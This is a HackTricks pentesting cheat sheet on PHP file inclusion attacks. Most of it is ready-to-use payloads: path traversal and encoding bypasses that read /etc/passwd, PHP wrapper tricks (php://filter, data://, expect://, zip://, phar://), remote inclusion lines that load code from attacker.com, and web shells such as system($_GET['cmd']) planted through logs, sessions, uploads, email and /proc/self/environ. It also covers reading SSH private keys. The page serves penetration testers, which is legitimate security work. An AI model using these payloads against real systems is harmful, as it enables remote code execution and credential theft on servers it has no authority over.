HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
๐Ÿ•ธ
Pentesting Web
File Inclusion/Path traversal
Support HackTricks and get benefits!

File Inclusion

Remote File Inclusion (RFI): The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include). Local File Inclusion (LFI): The sever loads a local file.
The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
Vulnerable PHP functions: require, require_once, include, include_once
A interesting tool to exploit this vulnerability: https://github.com/kurobeats/fimapโ€‹

Blind - Interesting - LFI2RCE files

1
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
Copied!

Linux

Mixing several *nix LFI lists and adding more paths I have created this one:
Auto_Wordlists/file_inclusion_linux.txt at main ยท carlospolop/Auto_Wordlists
GitHub
Try also to change / for \ Try also to add ../../../../../
A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found hereโ€‹

Windows

Merging several lists I have created:
Auto_Wordlists/file_inclusion_windows.txt at main ยท carlospolop/Auto_Wordlists
GitHub
Try also to change / for \ Try also to remove C:/ and add ../../../../../
A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found hereโ€‹

OS X

Check the LFI list of linux.

Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=http://myserver.com/phpshellcode.txt\.
1
http://example.com/index.php?page=../../../etc/passwd
Copied!

traversal sequences stripped non-recursively

1
http://example.com/index.php?page=....//....//....//etc/passwd
2
http://example.com/index.php?page=....\/....\/....\/etc/passwd
3
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
Copied!

Null byte (%00)

Bypass the append more chars at the end of the provided string (bypass of: $_GET['param']."php")
1
http://example.com/index.php?page=../../../etc/passwd%00
Copied!
This is solved since PHP 5.4

Encoding

You could use non-standard encondings like double URL encode (and others):
1
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
2
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
3
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
4
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Copied!

From existent folder

Maybe the back-end is checking the folder path:
1
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
Copied!

Path truncation

Bypass the append of more chars at the end of the provided string (bypass of: $_GET['param']."php")
1
In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
2
Check if last 6 chars are passwd --> passwd/
3
Check if last 4 chars are ".php" --> shellcode.php/.
Copied!
1
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
2
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
3
โ€‹
4
#With the next options, by trial and error, you have to discover how many "../" are needed to delete the appended string but not "/etc/passwd" (near 2027)
5
โ€‹
6
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
7
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
Copied!
Always try to start the path with a fake directory (a/).
This vulnerability was corrected in PHP 5.3.

Filter bypass tricks

1
http://example.com/index.php?page=....//....//etc/passwd
2
http://example.com/index.php?page=..///////..////..//////etc/passwd
3
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
4
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
Copied!

Basic RFI

1
http://example.com/index.php?page=http://atacker.com/mal.php
2
http://example.com/index.php?page=\\attacker.com\shared\mal.php
Copied!

Top 25 parameters

Hereโ€™s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):
1
?cat={payload}
2
?dir={payload}
3
?action={payload}
4
?board={payload}
5
?date={payload}
6
?detail={payload}
7
?file={payload}
8
?download={payload}
9
?path={payload}
10
?folder={payload}
11
?prefix={payload}
12
?include={payload}
13
?page={payload}
14
?inc={payload}
15
?locate={payload}
16
?show={payload}
17
?doc={payload}
18
?site={payload}
19
?type={payload}
20
?view={payload}
21
?content={payload}
22
?document={payload}
23
?layout={payload}
24
?mod={payload}
25
?conf={payload}
Copied!

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters allow perform basic modification operations on the data before being it's read or written. There are 5 categories of filters:
    • string.rot13
    • string.toupper
    • string.tolower
    • string.strip_tags: Remove tags from the data (everything between "<" and ">" chars)
      • Note that this filter has disappear from the modern versions of PHP
  • โ€‹Conversion Filtersโ€‹
    • convert.base64-encode
    • convert.base64-decode
    • convert.quoted-printable-encode
    • convert.quoted-printable-decode
    • convert.iconv.* : Transforms to a different encoding(convert.iconv.<input_enc>.<output_enc>) . To get the list of all the encodings supported run in the console: iconv -l
Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.
  • โ€‹Compression Filtersโ€‹
    • zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
    • zlib.inflate: Decompress the data
  • โ€‹Encryption Filtersโ€‹
    • mcrypt.* : Deprecated
    • mdecrypt.* : Deprecated
  • Other Filters
    • Running in php var_dump(stream_get_filters()); you can find a couple of unexpected filters:
      • consumed
      • dechunk: reverses HTTP chunked encoding
      • convert.*
1
# String Filters
2
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
3
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
4
## Same chain without the "|" char
5
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
6
## string.string_tags example
7
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
8
โ€‹
9
# Conversion filter
10
## B64 decode
11
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
12
## Chain B64 encode and decode
13
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
14
## convert.quoted-printable-encode example
15
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,ยฃhellooo=");
16
=C2=A3hellooo=3D
17
## convert.iconv.utf-8.utf-16le
18
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");
19
โ€‹
20
# Compresion Filter
21
## Compress + B64
22
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
23
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
Copied!
The part "php://filter" is case insensitive

php://fd

This wrapper allows to access file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:
1
echo file_get_contents("php://fd/3");
2
$myfile = fopen("/etc/passwd", "r");
Copied!
You can also use php://stdin, php://stdout and php://stderr to access the file descriptors 0, 1 and 2 respectively (not sure how this could be useful in an attack)

zip:// and rar://

Upload a Zip or Rar file with a PHPShell inside and access it. In order to be able to abuse the rar protocol it need to be specifically activated.
1
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
2
zip payload.zip payload.php;
3
mv payload.zip shell.jpg;
4
rm payload.php
5
โ€‹
6
http://example.com/index.php?page=zip://shell.jpg%23payload.php
7
โ€‹
8
# To compress with rar
9
rar a payload.rar payload.php;
10
mv payload.rar shell.jpg;
11
rm payload.php
12
http://example.com/index.php?page=rar://shell.jpg%23payload.php
Copied!

data://

1
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
2
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
3
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
4
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
5
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
6
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
7
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Copied!
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
Note that this protocol is restricted by php configurations allow_url_open and allow_url_include

expect://

Expect has to be activated. You can execute code using this.
1
http://example.com/index.php?page=expect://id
2
http://example.com/index.php?page=expect://ls
Copied!

input://

Specify your payload in the POST parameters
1
http://example.com/index.php?page=php://input
2
POST DATA: <?php system('id'); ?>
Copied!

phar://

A .phar file can be also used to execute PHP code if the web is using some function like include to load the file.
create_phar.php
1
<?php
2
$phar = new Phar('test.phar');
3
$phar->startBuffering();
4
$phar->addFromString('test.txt', 'text');
5
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
6
โ€‹
7
$phar->stopBuffering();
Copied!
And you can compile the phar executing the following line:
1
php --define phar.readonly=0 create_path.php
Copied!
A file called test.phar will be generated that you can use to abuse the LFI.
If the LFI is just reading the file and not executing the php code inside of it, for example using functions like file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize(). You can try to abuse a deserialization occurring when reading a file using the phar protocol. For more information read the following post:

More protocols

Check more possible protocols to include here:
  • โ€‹php://memory and php://temp โ€” Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
  • โ€‹file:// โ€” Accessing local filesystem
  • โ€‹http:// โ€” Accessing HTTP(s) URLs
  • โ€‹ftp:// โ€” Accessing FTP(s) URLs
  • โ€‹zlib:// โ€” Compression Streams
  • โ€‹glob:// โ€” Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)
  • โ€‹ssh2:// โ€” Secure Shell 2
  • โ€‹ogg:// โ€” Audio streams (Not useful to read arbitrary files)

LFI via PHP's 'assert'

If you encounter a difficult LFI that appears to be filtering traversal strings such as ".." and responding with something along the lines of "Hacking attempt" or "Nice try!", an 'assert' injection payload may work.
A payload like this:
1
' and die(show_source('/etc/passwd')) or '
Copied!
will successfully exploit PHP code for a "file" parameter that looks like this:
1
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
Copied!
It's also possible to get RCE in a vulnerable "assert" statement using the system() function:
1
' and die(system("whoami")) or '
Copied!
Be sure to URL-encode payloads before you send them.

LFI2RCE

Basic RFI

1
http://example.com/index.php?page=http://atacker.com/mal.php
2
http://example.com/index.php?page=\\attacker.com\shared\mal.php
Copied!

Via Apache log file

If the Apache server is vulnerable to LFI inside the include function you could try to access to /var/log/apache2/access.log, set inside the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and execute code using the "c" GET parameter.
Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string "quote;", PHP will throw an error there and nothing else will be executed.
This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the Shell. The header authorisation "basic" contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header. Other possible log paths:
1
/var/log/apache2/access.log
2
/var/log/apache/access.log
3
/var/log/apache2/error.log
4
/var/log/apache/error.log
5
/usr/local/apache/log/error_log
6
/usr/local/apache2/log/error_log
7
/var/log/nginx/access.log
8
/var/log/nginx/error.log
9
/var/log/httpd/error_log
Copied!

Via Email

Send a mail to a internal account ([email protected]) containing <?php echo system($_REQUEST["cmd"]); ?> and access to the mail /var/mail/USER&cmd=whoami

Via /proc/*/fd/*

  1. 1.
    Upload a lot of shells (for example : 100)
  2. 2.
    Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Via /proc/self/environ

Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
1
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
2
User-Agent: <?=phpinfo(); ?>
Copied!

Via upload

If you can upload a file, just inject the shell payload in it (e.g : <?php system($_GET['c']); ?> ).
1
http://example.com/index.php?page=path/to/uploaded/file.png
Copied!
In order to keep the file readable it is best to inject into the metadata of the pictures/doc/pdf

Via Zip fie upload

Upload a ZIP file containing a PHP shell compressed and access:
1
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
Copied!

Via PHP sessions

Check if the website use PHP Session (PHPSESSID)
1
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
2
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
Copied!
In PHP these sessions are stored into /var/lib/php5/sess\[PHPSESSID]_ files
1
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
2
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Copied!
Set the cookie to <?php system('cat /etc/passwd');?>
1
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Copied!
Use the LFI to include the PHP session file
1
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
Copied!

Via ssh

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

Via vsftpd logs

The logs of this FTP server are stored in /var/log/vsftpd.log. If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.

Via php filters (no file needed)

This writeup explains that you can use php filters to generate arbitrary content as output. Which basically means that you can generate arbitrary php code for the include without needing to write it into a file.

Via Nginx temp file storage

If you found a Local File Inclusion and Nginx is running in front of PHP you might be able to obtain RCE with the following technique:

Via PHP_SESSION_UPLOAD_PROGRESS

If you found a Local File Inclusion even if you don't have a session and session.auto_start is Off. If you provide the PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, PHP will enable the session for you. You could abuse this to get RCE:

Via temp file uploads in Windows

If you found a Local File Inclusion and and the server is running in Windows you might get RCE:

Via phpinfo() (file_uploads = on)

If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on you can get RCE:

Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

If you found a Local File Inclusion and you can exfiltrate the path of the temp file BUT the server is checking if the file to be included has PHP marks, you can try to bypass that check with this Race Condition:

References

EN-Local-File-Inclusion-1.pdf
125KB
PDF
Support HackTricks and get benefits!